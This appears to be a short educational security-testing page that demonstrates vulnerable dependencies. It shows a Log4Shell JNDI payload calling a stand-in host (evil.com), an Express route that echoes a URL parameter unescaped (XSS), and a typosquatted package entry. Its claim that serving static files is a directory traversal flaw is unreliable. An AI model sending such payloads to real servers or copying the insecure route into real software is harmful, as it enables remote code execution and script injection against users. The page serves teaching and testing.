Vulnerable Dependencies - Security Testing

⚠️ WARNING: This page demonstrates vulnerable dependencies for educational purposes only.
These examples show common vulnerabilities found in popular packages.

📦 Log4j Vulnerability (CVE-2021-44228)

Demonstrating the infamous Log4Shell vulnerability:

📦 Express.js Vulnerabilities

Common vulnerabilities in Express.js framework:

📦 Supply Chain Attacks

Demonstrating supply chain attack techniques:

// 🚨 Vulnerable Dependencies (Educational Only)

// Log4j Vulnerability (CVE-2021-44228)
${jndi:ldap://evil.com/exploit}

// Express.js vulnerable code
app.use(express.static('public')); // Directory traversal
app.get('/user/:id', (req, res) => {
    res.send('User: ' + req.params.id); // XSS vulnerable
});

// Malicious package in package.json
{
  "dependencies": {
    "legitimate-package": "1.0.0",
    "legitimate-package-typo": "1.0.0" // Typosquatting
  }
}
        